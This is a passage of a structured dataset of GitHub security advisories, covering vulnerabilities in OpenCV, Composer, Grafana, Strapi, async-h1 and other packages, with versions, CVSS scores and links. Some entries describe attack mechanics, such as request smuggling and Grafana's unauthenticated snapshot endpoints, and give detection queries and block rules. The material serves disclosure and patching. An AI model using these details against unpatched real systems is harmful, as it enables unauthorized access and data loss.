'<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16249'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15481'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/15531'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1752702'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/30'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T20:21:31Z', 'nvd_published_at': '2019-09-11T23:15:00Z'}"
+1.4.0,GHSA-frqg-7g38-6gcf,2021-10-11T18:39:06Z,2021-10-05T20:23:18Z,,['CVE-2021-41116'],Improper escaping of command arguments on Windows leading to command injection,"### Impact
+Windows users running Composer to install untrusted dependencies are affected and should definitely upgrade for safety. Other OSs and WSL are not affected.
+
+### Patches
+1.10.23 and 2.1.9 fix the issue
+
+### Workarounds
+None
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'composer/composer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'composer/composer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0'}, {'fixed': '2.1.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/composer/composer/security/advisories/GHSA-frqg-7g38-6gcf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41116'}, {'type': 'WEB', 'url': 'https://github.com/composer/composer/commit/ca5e2f8d505fd3bfac6f7c85b82f2740becbc0aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/composer/composer'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:44:04Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}"
+1.4.0,GHSA-5xvc-vgmp-jgc3,2021-10-29T13:44:43Z,2021-10-28T23:13:57Z,,['CVE-2021-41194'],Improper Access Control in jupyterhub-firstuseauthenticator,"### Impact
+
+When JupyterHub is used with FirstUseAuthenticator, the vulnerability allows unauthorized access to any user's account if `create_users=True` and the username is known or guessed.
+
+### Patches
+
+Upgrade to jupyterhub-firstuseauthenticator to 1.0, or apply patch https://github.com/jupyterhub/firstuseauthenticator/pull/38.patch
+
+### Workarounds
+
+If you cannot upgrade, there is no complete workaround, but it can be mitigated.
+
+If you cannot upgrade yet, you can disable user creation with `c.FirstUseAuthenticator.create_users = False`, which will only allow login with fully normalized usernames for already existing users prior to jupyterhub-firstuserauthenticator 1.0. If any users have never logged in with their normalized username (i.e. lowercase), they will still be vulnerable until you can patch or upgrade.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterhub-firstuseauthenticator'}, 'ecosystem_specific': {'affected_functions': ['firstuseauthenticator.firstuseauthenticator.FirstUseAuthenticator.authenticate']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/security/advisories/GHSA-5xvc-vgmp-jgc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41194'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38.patch'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38/commits/32b21898fb2b53b1a2e36270de6854ad70e9e9bf'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/pull/38/commits/9e200d974e0cb85d828a6afedb8ab90a37878f28'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/firstuseauthenticator/commit/953418e2450dbc2d854e332350849533b0ebc7ba'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/firstuseauthenticator'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T16:52:16Z', 'nvd_published_at': '2021-10-28T20:15:00Z'}"
+1.4.0,GHSA-ppj4-34rq-v8j9,2023-08-30T00:32:37Z,2021-10-25T19:43:15Z,,['CVE-2021-42836'],github.com/tidwall/gjson Vulnerable to REDoS attack,GJSON is a Go package that provides a fast and simple way to get values from a json document. GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42836'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/236'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/237'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0265'}]","{'cwe_ids': ['CWE-1333', 'CWE-400', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:27:20Z', 'nvd_published_at': '2021-10-22T18:15:00Z'}"
+1.4.0,GHSA-4cfr-gjfx-fj3x,2021-10-05T15:51:30Z,2021-10-05T17:53:11Z,,['CVE-2021-40324'],Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.,Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40324'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:51:30Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}"
+1.4.0,GHSA-w7x8-cq7r-g5g9,2021-10-22T19:37:10Z,2021-10-25T19:43:39Z,,['CVE-2021-33988'],Cross Site Scripting in Microweber,"Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33988'}, {'type': 'WEB', 'url': 'https://github.com/nck0099/osTicket/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T19:37:10Z', 'nvd_published_at': '2021-10-19T17:15:00Z'}"
+1.4.0,GHSA-wq8f-wvqp-xvvm,2021-11-18T15:34:09Z,2021-10-12T22:02:35Z,,['CVE-2017-12863'],Integer Overflow or Wraparound in OpenCV,"In opencv/modules/imgcodecs/src/grfmt_pxm.cpp, function PxMDecoder::readData has an integer overflow when calculate src_pitch. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding to OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12863'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9371'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:39:41Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}"
+1.4.0,GHSA-fm39-cw8h-3p63,2021-10-07T15:12:30Z,2021-10-12T22:07:14Z,,['CVE-2019-14491'],Out-of-bounds Read in OpenCV,"An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 4.1.1.26). There is an out of bounds read in the function cv::predictOrdered in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14491'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15125'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HPFLN6QAX6SUA4XR4NMKKXX26H3TYCVQ/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T15:12:30Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}"
+1.4.0,GHSA-pgjj-866w-fc5c,2021-10-11T16:14:26Z,2021-10-12T16:03:43Z,,['CVE-2021-21278'],Risk of code injection,"### Impact
+Some routes use `eval` or `Function constructor`, which may be injected by the target site with unsafe code, causing server-side security issues
+
+### Patches
+Temporarily removed the problematic route and added a `no-new-func` rule to eslint
+Self-built users should upgrade to 7f1c430 and later as soon as possible
+
+### Credits
+Tencent Woodpecker Security Team
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [https://github.com/DIYgod/RSSHub/issues](https://github.com/DIYgod/RSSHub/issues)
+* Email us at [i@diygod.me](mailto:i@diygod.me)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rsshub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/security/advisories/GHSA-pgjj-866w-fc5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21278'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/commit/7f1c43094e8a82e4d8f036ff7d42568fed00699d'}, {'type': 'PACKAGE', 'url': 'https://github.com/DIYgod/RSSHub'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rsshub'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T16:14:26Z', 'nvd_published_at': '2021-01-26T21:15:00Z'}"
+1.4.0,GHSA-3pcq-34w5-p4g2,2022-08-15T20:14:42Z,2021-10-21T17:49:30Z,,['CVE-2021-41167'],modern-async's `forEachSeries` and `forEachLimit` functions do not limit the number of requests,"### Impact
+
+This is a bug affecting two of the functions in this library: `forEachSeries` and `forEachLimit`. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects.
+
+### Patches
+
+The problem has been patched in 1.0.4.
+
+### Workarounds
+
+There is no workaround aside from upgrading to 1.0.4.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'modern-async'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41167'}, {'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/issues/5'}, {'type': 'WEB', 'url': 'https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436'}, {'type': 'PACKAGE', 'url': 'https://github.com/nicolas-van/modern-async'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T17:39:03Z', 'nvd_published_at': '2021-10-20T19:15:00Z'}"
+1.4.0,GHSA-37hx-4mcq-wc3h,2021-10-06T14:09:30Z,2021-10-06T17:48:16Z,,['CVE-2021-28128'],Weak Password Recovery Mechanism for Forgotten Password in Strapi,"In Strapi through 3.6.0, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28128'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/issues/9657'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v3.6.0'}, {'type': 'WEB', 'url': 'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt'}]","{'cwe_ids': ['CWE-640'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T14:09:30Z', 'nvd_published_at': '2021-05-06T14:15:00Z'}"
+1.4.0,GHSA-4vr9-8cjf-vf9c,2021-10-08T22:14:28Z,2021-10-12T16:00:37Z,,['CVE-2020-26281'],Async-h1 request smuggling possible with long unread bodies,"### Impact
+This vulnerability affects any webserver that uses async-h1 behind a reverse proxy, including all such Tide applications.
+
+If the server does not read the body of a request which is longer than some buffer length, async-h1 will attempt to read a subsequent request from the body content starting at that offset into the body.
+
+One way to exploit this vulnerability would be for an adversary to craft a request such that the body contains a request that would not be noticed by a reverse proxy, allowing it to forge forwarded/x-forwarded headers. If an application trusted the authenticity of these headers, it could be misled by the smuggled request.
+
+Another potential concern with this vulnerability is that if a reverse proxy is sending multiple http clients' requests along the same keep-alive connection, it would be possible for the smuggled request to specify a long content and capture another user's request in its body. This content could be captured in a post request to an endpoint that allows the content to be subsequently retrieved by the adversary.
+
+
+### Patches
+This has been addressed in async-h1 2.3.0 and previous versions have been yanked.
+
+### Workarounds
+none
+
+### References
+https://github.com/http-rs/async-h1/releases/tag/v2.3.0
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [async-h1](https://github.com/http-rs/async-h1)
+* Contact a core team member on [zulip](https://http-rs.zulip-chat.com) or [discord](https://discord.gg/x2gKzst)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'async-h1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http-rs/async-h1/security/advisories/GHSA-4vr9-8cjf-vf9c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26281'}, {'type': 'PACKAGE', 'url': 'https://github.com/http-rs/async-h1'}, {'type': 'WEB', 'url': 'https://github.com/http-rs/async-h1/releases/tag/v2.3.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0093.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:14:28Z', 'nvd_published_at': '2020-12-21T22:15:00Z'}"
+1.4.0,GHSA-69j6-29vr-p3j9,2021-11-18T15:13:27Z,2021-10-05T20:24:02Z,,['CVE-2021-39226'],Authentication bypass for viewing and deletions of snapshots,"Today we are releasing Grafana 7.5.11, and 8.1.6. These patch releases include an important security fix for an issue that affects all Grafana versions from 2.0.1.
+
+[Grafana Cloud](https://grafana.com/cloud) instances have already been patched and an audit did not find any usage of this attack vector. [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo.
+
+8.1.5 contained a single fix for bar chart panels. We believe that users can expedite deployment by moving from 8.1.4 to 8.1.6 directly.
+
+## CVE-2021-39226 Snapshot authentication bypass
+
+### Summary
+
+CVSS Score: 9.8 Critical
+CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+
+We received a security report to [security@grafana.com](mailto:security@grafana.com) on 2021-09-15 about a vulnerability in Grafana regarding the snapshot feature. It was later identified as affecting Grafana versions from 2.0.1 to 8.1.6. [CVE-2021-39226](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39226) has been assigned to this vulnerability.
+
+### Impact
+Unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths:
+
+* `/dashboard/snapshot/:key`, or
+* `/api/snapshots/:key`
+
+If the snapshot ""public_mode"" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path:
+
+* `/api/snapshots-delete/:deleteKey`
+
+Regardless of the snapshot ""public_mode"" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths:
+
+* `/api/snapshots/:key`, or
+* `/api/snapshots-delete/:deleteKey`
+
+The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss.
+
+### Attack audit
+
+While we can not guarantee that the below will identify all attacks, if you do find something with the below, you should consider doing a full assessment.
+
+#### Through reverse proxy/load balancer logs
+
+To determine if your Grafana installation has been exploited for this vulnerability, search through your reverse proxy/load balancer access logs for instances where the path is `/dashboard/snapshot/:key`, `/api/snapshots/:key` or `/api/snapshots-delete/:deleteKey`, and the response status code was 200 (OK).
+For example, if you’re using the Kubernetes ingress-nginx controller and sending logs to Loki, use a LogQL query like `{job=""nginx-ingress-controller""} |= ""\""status\"": 200"" |= ""\""uri\"": \""/api/snapshots/:key\""""`.
+
+#### Through the Grafana Enterprise audit feature
+
+If you enabled “Log web requests” in your configuration with `router_logging = true`, look for
+`""requestUri"":""/api/snapshots-delete/”`,`“requestUri"":""/api/snapshots/:key""`, or `""type"":""snapshot""` in combination with `""action"":""delete""`.
+
+### Patched versions
+
+Release 8.1.6:
+
+- [Download Grafana 8.1.6](https://grafana.com/grafana/download/8.1.6)
+- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/)
+
+Release 7.5.11:
+
+- [Download Grafana 7.5.11](https://grafana.com/grafana/download/7.5.11)
+- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-11/)
+
+### Solutions and mitigations
+
+Download and install the appropriate patch for your version of Grafana.
+
+[Grafana Cloud](https://grafana.com/cloud) instances have already been patched, and [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo.
+
+### Workaround
+
+If for some reason you cannot upgrade:
+
+You can use a reverse proxy or similar to block access to the literal paths
+* `/api/snapshots/:key`
+* `/api/snapshots-delete/:deleteKey`
+* `/dashboard/snapshot/:key`
+* `/api/snapshots/:key`
+
+They have no normal function and can be disabled without side effects.
+
+### Timeline and postmortem
+
+Here is a detailed timeline starting from when we originally learned of the issue. All times in UTC.
+
+* 2021-09-15 14:49: Tuan Tran theblackturtle0901@gmail.com sends initial report about viewing snapshots without authentication
+* 2021-09-15 15:56: Initial reproduction
+* 2021-09-15 17:10: MEDIUM severity declared
+* 2021-09-15 18:58: Workaround deployed on Grafana Cloud
+* 2021-09-15 19:15: `/api/snapshots/:key` found to be vulnerable as well
+* 2021-09-15 19:30: `/api/snapshots/:key` blocked on Grafana Cloud
+* 2021-09-16 09:31: `/api/snapshots-delete/:deleteKey` found to be vulnerable as well, blocked on Grafana Cloud. From this point forward, Cloud is not affected any more.
+* 2021-09-16 09:35: HIGH severity declared
+* 2021-09-16 11:19: Realization that combination of deletion and viewing allows enumeration and permanent DoS
+* 2021-09-16 11:19: CRITICAL declared
+* 2021-09-17 10:53: Determination that no weekend work is needed. While issue is CRITICAL, scope is very limited
+* 2021-09-17 14:26: Audit of Grafana Cloud concluded, no evidence of exploitation
+* 2021-09-23: Grafana Cloud instances updated
+* 2021-09-28 12:00: Grafana Enterprise images released to customers under embargo
+* 2021-10-05 17:00: Public release
+
+## Reporting security issues
+
+If you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of
+Grafana Labs's open source and commercial products (including but not limited to Grafana, Tempo, Loki, Amixr, k6, Tanka, and Grafana Cloud, Grafana Enterprise, and grafana.com). We only accept vulnerability reports at this address. We would prefer that you encrypt your message to us using our PGP key. The key fingerprint is:
+
+F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA
+
+The key is available from [keys.gnupg.net](http://keys.gnupg.net/pks/lookup?op=get&fingerprint=on&search=0xD1258932BE24C5CA) by searching for [security@grafana](http://keys.gnupg.net/pks/lookup?search=security@grafana&fingerprint=on&op=index.
+
+## Security announcements
+
+We maintain a category on the community site named [Security Announcements](https://community.grafana.com/c/security-announcements),
+where we will post a summary, remediation, and mitigation details for any patch containing security fixes. You can also subscribe to email updates to this category if you have a grafana.com account and sign in to the community site, or via updates from our [Security Announcements RSS feed](https://community.grafana.com/c/security-announcements.rss).
+
+## Acknowledgement
+
+We would like to thank [Tran Viet Tuan](https://github.com/theblackturtle) for responsibly disclosing the initially discovered vulnerability to us.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.5.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39226'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-11/'}, {'type': 'WEB', 'url': 'https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCKBFUSY6V4VU5AQUYWKISREZX5NLQJT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E6ANHRDBXQT6TURLP2THM26ZPDINFBEG/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211029-0008/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/10/05/4'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:49:35Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}"
+1.4.0,GHSA-mx3x-ghqm-r43h,2021-10-08T22:13:34Z,2021-10-12T16:27:18Z,,['CVE-2020-28280'],Prototype pollution vulnerability in 'predefine',Prototype pollution vulnerability in 'predefine' versions 0.0.0 through 0.1.2 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'predefine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28280'}, {'type': 'WEB', 'url': 'https://github.com/bigpipe/predefine/commit/1a86a013c0b37c9d6ca078ba34017052af38b7fc'}, {'type': 'PACKAGE', 'url': 'https://github.com/bigpipe/predefine'}, {'type': 'WEB', 'url': 'https://github.com/bigpipe/predefine/blob/238137e3d1b8288ff5d7529c3cbcdd371888c26b/index.js#L284'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28280'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:13:34Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}"
